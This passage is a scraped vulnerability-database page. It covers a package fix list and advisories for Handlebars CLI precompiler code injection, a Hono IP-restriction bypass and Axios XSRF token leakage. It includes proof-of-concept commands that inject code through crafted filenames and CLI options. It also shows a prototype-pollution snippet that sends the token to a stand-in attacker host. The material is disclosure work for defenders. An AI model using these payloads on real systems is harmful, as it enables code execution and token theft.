      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42036"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42037"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42038"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42040"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42042"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44455"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44456"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44457"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44458"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44459"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4923"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "summary": "Security fixes for CVE-2025-62718, CVE-2025-69873, CVE-2026-29045, CVE-2026-29085, CVE-2026-29086, CVE-2026-29087, CVE-2026-2950, CVE-2026-30827, CVE-2026-33750, CVE-2026-33891, CVE-2026-33894, CVE-2026-33895, CVE-2026-33896, CVE-2026-33916, CVE-2026-33937, CVE-2026-34043, CVE-2026-35213, CVE-2026-39406, CVE-2026-39407, CVE-2026-39408, CVE-2026-39409, CVE-2026-39410, CVE-2026-40175, CVE-2026-41238, CVE-2026-41239, CVE-2026-41240, CVE-2026-42033, CVE-2026-42034, CVE-2026-42035, CVE-2026-42036, CVE-2026-42037, CVE-2026-42038, CVE-2026-42039, CVE-2026-42040, CVE-2026-42041, CVE-2026-42042, CVE-2026-42043, CVE-2026-42044, CVE-2026-42264, CVE-2026-42338, CVE-2026-44455, CVE-2026-44456, CVE-2026-44457, CVE-2026-44458, CVE-2026-44459, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, CVE-2026-6321, CVE-2026-6322, ghsa-2328-f5f3-gj25, ghsa-26pp-8wgv-hjvm, ghsa-27v5-c462-wpq7, ghsa-2g4f-4pwh-qvx6, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-39q2-94rc-95cp, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-3w6x-2g7m-8v23, ghsa-442j-39wm-28r2, ghsa-445q-vr5w-6q77, ghsa-458j-xx4x-4375, ghsa-46wh-pxpv-q5gq, ghsa-5c6j-r48x-rmvq, ghsa-5c9x-8gcm-mpgx, ghsa-5m6q-g25r-mvwx, ghsa-5pq2-9x2x-5p6w, ghsa-62hf-57xw-28j9, ghsa-69xw-7hcm-h432, ghsa-6chq-wfr3-2hj9, ghsa-7rx3-28cr-v5wh, ghsa-92pp-h63x-v22m, ghsa-9cx6-37pm-9jff, ghsa-9vqf-7f2p-gf9v, ghsa-c2c7-rcm5-vvqj, ghsa-crv5-9vww-q3g8, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fvcv-3m26-pcqx, ghsa-h7mw-gpvr-xq4m, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-m7pr-hjqh-92cm, ghsa-p6xx-57qc-3wxr, ghsa-p77w-8qqv-26rm, ghsa-pf86-5x62-jrwf, ghsa-pmwg-cvhr-8vh7, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q5qw-h33p-qvwr, ghsa-q67f-28xg-22rw, ghsa-q8qp-cvcw-x6jj, ghsa-qj8w-gfj5-8c6v, ghsa-qp7p-654g-cw7p, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r5rp-j6wh-rvv4, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v8w9-8mx6-g223, ghsa-v9jr-rg53-9pgp, ghsa-vf2m-468p-8v99, ghsa-w9j2-pvgh-6h63, ghsa-wc8c-qw6v-h7f6, ghsa-wmmm-f939-6g9c, ghsa-xf4j-xp2r-rqqx, ghsa-xhjh-pmcv-23jw, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf, ghsa-xpcf-pg52-r92g, ghsa-xx6v-rp6x-q39c applied in versions: 2.19.5-r0",
  "upstream": [
    "CVE-2025-62718",
    "CVE-2025-69873",
    "CVE-2026-29045",
    "CVE-2026-29085",
    "CVE-2026-29086",
    "CVE-2026-29087",
    "CVE-2026-2950",
    "CVE-2026-30827",
    "CVE-2026-33750",
    "CVE-2026-33891",
    "CVE-2026-33894",
    "CVE-2026-33895",
    "CVE-2026-33896",
    "CVE-2026-33916",
    "CVE-2026-33937",
    "CVE-2026-34043",
    "CVE-2026-35213",
    "CVE-2026-39406",
    "CVE-2026-39407",
    "CVE-2026-39408",
    "CVE-2026-39409",
    "CVE-2026-39410",
    "CVE-2026-40175",
    "CVE-2026-41238",
    "CVE-2026-41239",
    "CVE-2026-41240",
    "CVE-2026-42033",
    "CVE-2026-42034",
    "CVE-2026-42035",
    "CVE-2026-42036",
    "CVE-2026-42037",
    "CVE-2026-42038",
    "CVE-2026-42039",
    "CVE-2026-42040",
    "CVE-2026-42041",
    "CVE-2026-42042",
    "CVE-2026-42043",
    "CVE-2026-42044",
    "CVE-2026-42264",
    "CVE-2026-42338",
    "CVE-2026-44455",
    "CVE-2026-44456",
    "CVE-2026-44457",
    "CVE-2026-44458",
    "CVE-2026-44459",
    "CVE-2026-4800",
    "CVE-2026-4923",
    "CVE-2026-4926",
    "CVE-2026-6321",
    "CVE-2026-6322",
    "ghsa-2328-f5f3-gj25",
    "ghsa-26pp-8wgv-hjvm",
    "ghsa-27v5-c462-wpq7",
    "ghsa-2g4f-4pwh-qvx6",
    "ghsa-2qvq-rjwj-gvw9",
    "ghsa-2w6w-674q-4c4q",
    "ghsa-39q2-94rc-95cp",
    "ghsa-3mfm-83xf-c92r",
    "ghsa-3p68-rc4w-qgx5",
    "ghsa-3v7f-55p6-f55p",
    "ghsa-3w6x-2g7m-8v23",
    "ghsa-442j-39wm-28r2",
    "ghsa-445q-vr5w-6q77",
    "ghsa-458j-xx4x-4375",
    "ghsa-46wh-pxpv-q5gq",
    "ghsa-5c6j-r48x-rmvq",
    "ghsa-5c9x-8gcm-mpgx",
    "ghsa-5m6q-g25r-mvwx",
    "ghsa-5pq2-9x2x-5p6w",
    "ghsa-62hf-57xw-28j9",
    "ghsa-69xw-7hcm-h432",
    "ghsa-6chq-wfr3-2hj9",
    "ghsa-7rx3-28cr-v5wh",
    "ghsa-92pp-h63x-v22m",
    "ghsa-9cx6-37pm-9jff",
    "ghsa-9vqf-7f2p-gf9v",
    "ghsa-c2c7-rcm5-vvqj",
    "ghsa-crv5-9vww-q3g8",
    "ghsa-f23m-r3pf-42rh",
    "ghsa-f886-m6hf-6m8v",
    "ghsa-fvcv-3m26-pcqx",
    "ghsa-h7mw-gpvr-xq4m",
    "ghsa-j3q9-mxjg-w52f",
    "ghsa-jg4p-7fhp-p32p",
    "ghsa-m7pr-hjqh-92cm",
    "ghsa-p6xx-57qc-3wxr",
    "ghsa-p77w-8qqv-26rm",
    "ghsa-pf86-5x62-jrwf",
    "ghsa-pmwg-cvhr-8vh7",
    "ghsa-ppp5-5v6c-4jwp",
    "ghsa-q3j6-qgpj-74h6",
    "ghsa-q5qw-h33p-qvwr",
    "ghsa-q67f-28xg-22rw",
    "ghsa-q8qp-cvcw-x6jj",
    "ghsa-qj8w-gfj5-8c6v",
    "ghsa-qp7p-654g-cw7p",
    "ghsa-r4q5-vmmm-2653",
    "ghsa-r5fr-rjxr-66jc",
    "ghsa-r5rp-j6wh-rvv4",
    "ghsa-v2v4-37r5-5v8g",
    "ghsa-v39h-62p7-jpjc",
    "ghsa-v8w9-8mx6-g223",
    "ghsa-v9jr-rg53-9pgp",
    "ghsa-vf2m-468p-8v99",
    "ghsa-w9j2-pvgh-6h63",
    "ghsa-wc8c-qw6v-h7f6",
    "ghsa-wmmm-f939-6g9c",
    "ghsa-xf4j-xp2r-rqqx",
    "ghsa-xhjh-pmcv-23jw",
    "ghsa-xhpv-hc6g-r9c6",
    "ghsa-xjpj-3mr7-gcpf",
    "ghsa-xpcf-pg52-r92g",
    "ghsa-xx6v-rp6x-q39c"
  ]
}

GHSA-XJPJ-3MR7-GCPF

Vulnerability from github – Published: 2026-03-27 18:22 – Updated: 2026-03-30 20:08

Summary

Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options

Details

Summary

The Handlebars CLI precompiler (bin/handlebars / lib/precompiler.js) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser.

Description

lib/precompiler.js generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist:

1. Template name injection

// Vulnerable code pattern
output += 'templates["' + template.name + '"] = template(...)';

template.name is derived from the file system path. A filename containing " or ']; breaks out of the string literal and injects arbitrary JavaScript.

2. Namespace injection (`-n` / `--namespace`)

// Vulnerable code pattern
output += 'var templates = ' + opts.namespace + ' = ' + opts.namespace + ' || {};';

opts.namespace is emitted as raw JavaScript. Anything after a ; in the value becomes an additional JavaScript statement.

3. CommonJS path injection (`-c` / `--commonjs`)

// Vulnerable code pattern
output += 'var Handlebars = require("' + opts.commonjs + '");';

opts.commonjs is interpolated inside double quotes with no escaping, allowing " to close the string and inject further code.

4. AMD path injection (`-h` / `--handlebarPath`)

// Vulnerable code pattern
output += "define(['" + opts.handlebarPath + "handlebars.runtime'], ...)";

opts.handlebarPath is interpolated inside single quotes, allowing ' to close the array element.

All four injection points result in code that executes when the generated bundle is require()d or loaded in a browser.

Proof of Concept

Template name vector (creates a file pwned on disk):

mkdir -p templates
printf 'Hello' > "templates/evil'] = (function(){require(\"fs\").writeFileSync(\"pwned\",\"1\")})(); //.handlebars"

node bin/handlebars templates -o out.js
node -e 'require("./out.js")'  # Executes injected code, creates ./pwned

Namespace vector:

node bin/handlebars templates -o out.js \
  -n "App.ns; require('fs').writeFileSync('pwned2','1'); //"
node -e 'require("./out.js")'

CommonJS vector:

node bin/handlebars templates -o out.js \
  -c 'handlebars"); require("fs").writeFileSync("pwned3","1"); //'
node -e 'require("./out.js")'

AMD vector:

node bin/handlebars templates -o out.js -a \
  -h "'); require('fs').writeFileSync('pwned4','1'); // "
node -e 'require("./out.js")'

Workarounds

Validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (", ', ;, etc.).
Use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines.
Run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation.
Audit template filenames in any repository or package that is consumed by an automated build pipeline.

Severity ?

8.2 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.7.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "handlebars"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.7.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33941"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T18:22:10Z",
    "nvd_published_at": "2026-03-27T22:16:21Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings \u2014 template file names and several CLI options \u2014 directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser.\n\n## Description\n\n`lib/precompiler.js` generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist:\n\n### 1. Template name injection\n\n```javascript\n// Vulnerable code pattern\noutput += \u0027templates[\"\u0027 + template.name + \u0027\"] = template(...)\u0027;\n```\n\n`template.name` is derived from the file system path. A filename containing `\"` or `\u0027];` breaks out of the string literal and injects arbitrary JavaScript.\n\n### 2. Namespace injection (`-n` / `--namespace`)\n\n```javascript\n// Vulnerable code pattern\noutput += \u0027var templates = \u0027 + opts.namespace + \u0027 = \u0027 + opts.namespace + \u0027 || {};\u0027;\n```\n\n`opts.namespace` is emitted as raw JavaScript. Anything after a `;` in the value becomes an additional JavaScript statement.\n\n### 3. CommonJS path injection (`-c` / `--commonjs`)\n\n```javascript\n// Vulnerable code pattern\noutput += \u0027var Handlebars = require(\"\u0027 + opts.commonjs + \u0027\");\u0027;\n```\n\n`opts.commonjs` is interpolated inside double quotes with no escaping, allowing `\"` to close the string and inject further code.\n\n### 4. AMD path injection (`-h` / `--handlebarPath`)\n\n```javascript\n// Vulnerable code pattern\noutput += \"define([\u0027\" + opts.handlebarPath + \"handlebars.runtime\u0027], ...)\";\n```\n\n`opts.handlebarPath` is interpolated inside single quotes, allowing `\u0027` to close the array element.\n\nAll four injection points result in code that executes when the generated bundle is `require()`d or loaded in a browser.\n\n## Proof of Concept\n\n**Template name vector (creates a file `pwned` on disk):**\n\n```bash\nmkdir -p templates\nprintf \u0027Hello\u0027 \u003e \"templates/evil\u0027] = (function(){require(\\\"fs\\\").writeFileSync(\\\"pwned\\\",\\\"1\\\")})(); //.handlebars\"\n\nnode bin/handlebars templates -o out.js\nnode -e \u0027require(\"./out.js\")\u0027  # Executes injected code, creates ./pwned\n```\n\n**Namespace vector:**\n\n```bash\nnode bin/handlebars templates -o out.js \\\n  -n \"App.ns; require(\u0027fs\u0027).writeFileSync(\u0027pwned2\u0027,\u00271\u0027); //\"\nnode -e \u0027require(\"./out.js\")\u0027\n```\n\n**CommonJS vector:**\n\n```bash\nnode bin/handlebars templates -o out.js \\\n  -c \u0027handlebars\"); require(\"fs\").writeFileSync(\"pwned3\",\"1\"); //\u0027\nnode -e \u0027require(\"./out.js\")\u0027\n```\n\n**AMD vector:**\n\n```bash\nnode bin/handlebars templates -o out.js -a \\\n  -h \"\u0027); require(\u0027fs\u0027).writeFileSync(\u0027pwned4\u0027,\u00271\u0027); // \"\nnode -e \u0027require(\"./out.js\")\u0027\n```\n\n## Workarounds\n\n- **Validate all CLI inputs** before invoking the precompiler. Reject filenames and option values  that contain characters with JavaScript string-escaping significance (`\"`, `\u0027`, `;`, etc.).\n- **Use a fixed, trusted namespace string** passed via a configuration file rather than  command-line arguments in automated pipelines.\n- **Run the precompiler in a sandboxed environment** (container with no write access to sensitive  paths) to limit the impact of successful exploitation.\n- **Audit template filenames** in any repository or package that is consumed by an automated  build pipeline.",
  "id": "GHSA-xjpj-3mr7-gcpf",
  "modified": "2026-03-30T20:08:52Z",
  "published": "2026-03-27T18:22:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33941"
    },
    {
      "type": "WEB",
      "url": "https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/handlebars-lang/handlebars.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options"
}

GHSA-XPCF-PG52-R92G

Vulnerability from github – Published: 2026-04-08 00:17 – Updated: 2026-04-24 21:06

Summary

Hono has incorrect IP matching in ipRestriction() for IPv4-mapped IPv6 addresses

Details

Summary

ipRestriction() does not canonicalize IPv4-mapped IPv6 client addresses (e.g. ::ffff:127.0.0.1) before applying IPv4 allow or deny rules. In environments such as Node.js dual-stack, this can cause IPv4 rules to fail to match, leading to unintended authorization behavior.

Details

The middleware classifies client addresses based on their textual form. Addresses containing ":" are treated as IPv6, including IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1. These addresses are not normalized to IPv4 before matching.

As a result:

IPv4 static rules (e.g. 127.0.0.1) do not match because the raw string differs
IPv4 CIDR rules (e.g. 127.0.0.0/8, 10.0.0.0/8) are skipped because the address is treated as IPv6

For example, with:

denyList: ['127.0.0.1']

a request from 127.0.0.1 may be represented as ::ffff:127.0.0.1 and bypass the deny rule.

This behavior commonly occurs in Node.js environments where IPv4 clients are exposed as IPv4-mapped IPv6 addresses.

Impact

Applications that rely on IPv4-based ipRestriction() rules may incorrectly allow or deny requests.

In affected deployments, a denied IPv4 client may bypass access restrictions. Conversely, legitimate clients may be rejected when using IPv4 allow lists.

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

6.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "hono"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.12.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39409"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-180"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:17:14Z",
    "nvd_published_at": "2026-04-08T15:16:14Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`ipRestriction()` does not canonicalize IPv4-mapped IPv6 client addresses (e.g. `::ffff:127.0.0.1`) before applying IPv4 allow or deny rules. In environments such as Node.js dual-stack, this can cause IPv4 rules to fail to match, leading to unintended authorization behavior.\n\n## Details\n\nThe middleware classifies client addresses based on their textual form. Addresses containing \"`:`\" are treated as IPv6, including IPv4-mapped IPv6 addresses such as `::ffff:127.0.0.1`. These addresses are not normalized to IPv4 before matching.\n\nAs a result:\n\n* IPv4 static rules (e.g. `127.0.0.1`) do not match because the raw string differs\n* IPv4 CIDR rules (e.g. `127.0.0.0/8`, `10.0.0.0/8`) are skipped because the address is treated as IPv6\n\nFor example, with:\n\n`denyList: [\u0027127.0.0.1\u0027]`\n\na request from `127.0.0.1` may be represented as `::ffff:127.0.0.1` and bypass the deny rule.\n\nThis behavior commonly occurs in Node.js environments where IPv4 clients are exposed as IPv4-mapped IPv6 addresses.\n\n## Impact\n\nApplications that rely on IPv4-based `ipRestriction()` rules may incorrectly allow or deny requests.\n\nIn affected deployments, a denied IPv4 client may bypass access restrictions. Conversely, legitimate clients may be rejected when using IPv4 allow lists.",
  "id": "GHSA-xpcf-pg52-r92g",
  "modified": "2026-04-24T21:06:13Z",
  "published": "2026-04-08T00:17:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/honojs/hono/security/advisories/GHSA-xpcf-pg52-r92g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39409"
    },
    {
      "type": "WEB",
      "url": "https://github.com/honojs/hono/commit/48fa2233bc092f650119f42df043050737cabf39"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/honojs/hono"
    },
    {
      "type": "WEB",
      "url": "https://github.com/honojs/hono/releases/tag/v4.12.12"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Hono has incorrect IP matching in ipRestriction() for IPv4-mapped IPv6 addresses"
}

GHSA-XX6V-RP6X-Q39C

Vulnerability from github – Published: 2026-05-05 00:25 – Updated: 2026-05-05 00:25

Summary

Axios: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion

Details

Vulnerability Disclosure: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion

Summary

The Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker.

Severity: Medium (CVSS 5.4) Affected Versions: All versions since withXSRFToken was introduced Vulnerable Component: lib/helpers/resolveConfig.js:59 Environment: Browser-only (XSRF logic only runs when hasStandardBrowserEnv is true)

CWE

CWE-201: Insertion of Sensitive Information Into Sent Data
CWE-183: Permissive List of Allowed Inputs

CVSS 3.1

Score: 5.4 (Medium)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Metric	Value	Justification
Attack Vector	Network	PP triggered remotely via vulnerable dependency
Attack Complexity	Low	Once PP exists, single property assignment. Consistent with GHSA-fvcv-3m26-pcqx
Privileges Required	None	No authentication needed
User Interaction	Required	Victim must use browser with axios making cross-origin requests
Scope	Unchanged	Token leakage within browser context
Confidentiality	Low	XSRF token leaked — anti-CSRF token, not session token
Integrity	Low	Stolen XSRF token enables CSRF attacks (bypass CSRF protection only)
Availability	None	No availability impact

Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input when triggered via prototype pollution.

If an attacker can pollute Object.prototype.withXSRFToken with any truthy value (e.g., 1, "true", {}), Axios will automatically inherit this value during config merge. The truthy value short-circuits the same-origin check, causing the XSRF cookie value to be sent as a request header to every destination.

Vulnerable Code

File: lib/helpers/resolveConfig.js, lines 57-66

// Line 57: Function check — only applies if withXSRFToken is a function
withXSRFToken && utils.isFunction(withXSRFToken) && (withXSRFToken = withXSRFToken(newConfig));

// Line 59: The vulnerable condition
if (withXSRFToken || (withXSRFToken !== false && isURLSameOrigin(newConfig.url))) {
//  ^^^^^^^^^^^^^^^^
//  When withXSRFToken = 1 (truthy non-boolean): this is true → short-circuits
//  isURLSameOrigin() is NEVER called → token sent to ANY origin
  const xsrfValue = xsrfHeaderName && xsrfCookieName && cookies.read(xsrfCookieName);
  if (xsrfValue) {
    headers.set(xsrfHeaderName, xsrfValue);
  }
}

Designed behavior: - true → always send token (explicit cross-origin opt-in) - false → never send token - undefined → send only for same-origin requests

Actual behavior for non-boolean truthy values (1, "false", {}, []): - All treated as truthy → same-origin check skipped → token sent everywhere

Proof of Concept

// Simulated prototype pollution from any vulnerable dependency
Object.prototype.withXSRFToken = 1;

// In browser with document.cookie = "XSRF-TOKEN=secret-csrf-token-abc123"
// Every axios request now includes: X-XSRF-TOKEN: secret-csrf-token-abc123
// Even to cross-origin hosts:
await axios.get('https://attacker.com/collect');
// → attacker receives the XSRF token in request headers

Verified PoC Output

withXSRFToken Value        Sends Token Cross-Origin  Expected
true (boolean)             YES                       Yes (opt-in)
false (boolean)            No                        No
undefined (default)        No                        No
1 (number)                 YES ← BUG                No
"false" (string)           YES ← BUG                No
{} (object)                YES ← BUG                No
[] (array)                 YES ← BUG                No

Prototype pollution:
  Object.prototype.withXSRFToken = 1
  config.withXSRFToken = 1 → leaks=true
  isURLSameOrigin() was NOT called (short-circuited)

Impact Analysis

XSRF Token Theft: Anti-CSRF token sent as header to attacker-controlled server, enabling CSRF attacks against the victim application
Universal Scope: A single Object.prototype.withXSRFToken = 1 affects every axios request in the application
Misconfiguration Risk: Developer writing withXSRFToken: "false" (string) instead of false (boolean) triggers the same issue without PP

Limitations: - Browser-only (XSRF logic runs only in hasStandardBrowserEnv) - XSRF tokens are anti-CSRF tokens, not session tokens — leakage enables CSRF but not direct session hijacking - Attacker still needs a way to deliver the forged request after obtaining the token

Recommended Fix

Use strict boolean comparison:

// FIXED: lib/helpers/resolveConfig.js
const shouldSendXSRF = withXSRFToken === true ||
  (withXSRFToken == null && isURLSameOrigin(newConfig.url));

if (shouldSendXSRF) {
  const xsrfValue = xsrfHeaderName && xsrfCookieName && cookies.read(xsrfCookieName);
  if (xsrfValue) {
    headers.set(xsrfHeaderName, xsrfValue);
  }
}

Resources

Timeline

Date	Event
2026-04-15	Vulnerability discovered during source code audit
2026-04-16	Report revised: corrected CVSS, documented limitations
TBD	Report submitted to vendor via GitHub Security Advisory

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.31.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.31.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42042"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-183",
      "CWE-201"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T00:25:22Z",
    "nvd_published_at": "2026-04-24T18:16:31Z",
    "severity": "MODERATE"
  },
  "details": "# Vulnerability Disclosure: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion\n\n## Summary\n\nThe Axios library\u0027s XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the `withXSRFToken` config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (`isURLSameOrigin`) is **short-circuited**, causing XSRF tokens to be sent to **all** request targets including cross-origin servers controlled by an attacker.\n\n**Severity:** Medium (CVSS 5.4)\n**Affected Versions:** All versions since `withXSRFToken` was introduced\n**Vulnerable Component:** `lib/helpers/resolveConfig.js:59`\n**Environment:** Browser-only (XSRF logic only runs when `hasStandardBrowserEnv` is true)\n\n## CWE\n\n- **CWE-201:** Insertion of Sensitive Information Into Sent Data\n- **CWE-183:** Permissive List of Allowed Inputs\n\n## CVSS 3.1\n\n**Score: 5.4 (Medium)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP triggered remotely via vulnerable dependency |\n| Attack Complexity | Low | Once PP exists, single property assignment. Consistent with GHSA-fvcv-3m26-pcqx |\n| Privileges Required | None | No authentication needed |\n| User Interaction | Required | Victim must use browser with axios making cross-origin requests |\n| Scope | Unchanged | Token leakage within browser context |\n| Confidentiality | Low | XSRF token leaked \u2014 anti-CSRF token, not session token |\n| Integrity | Low | Stolen XSRF token enables CSRF attacks (bypass CSRF protection only) |\n| Availability | None | No availability impact |\n\n## Usage of \"Helper\" Vulnerabilities\n\nThis vulnerability requires **Zero Direct User Input** when triggered via prototype pollution.\n\nIf an attacker can pollute `Object.prototype.withXSRFToken` with any truthy value (e.g., `1`, `\"true\"`, `{}`), Axios will automatically inherit this value during config merge. The truthy value short-circuits the same-origin check, causing the XSRF cookie value to be sent as a request header to every destination.\n\n## Vulnerable Code\n\n**File:** `lib/helpers/resolveConfig.js`, lines 57-66\n\n```javascript\n// Line 57: Function check \u2014 only applies if withXSRFToken is a function\nwithXSRFToken \u0026\u0026 utils.isFunction(withXSRFToken) \u0026\u0026 (withXSRFToken = withXSRFToken(newConfig));\n\n// Line 59: The vulnerable condition\nif (withXSRFToken || (withXSRFToken !== false \u0026\u0026 isURLSameOrigin(newConfig.url))) {\n//  ^^^^^^^^^^^^^^^^\n//  When withXSRFToken = 1 (truthy non-boolean): this is true \u2192 short-circuits\n//  isURLSameOrigin() is NEVER called \u2192 token sent to ANY origin\n  const xsrfValue = xsrfHeaderName \u0026\u0026 xsrfCookieName \u0026\u0026 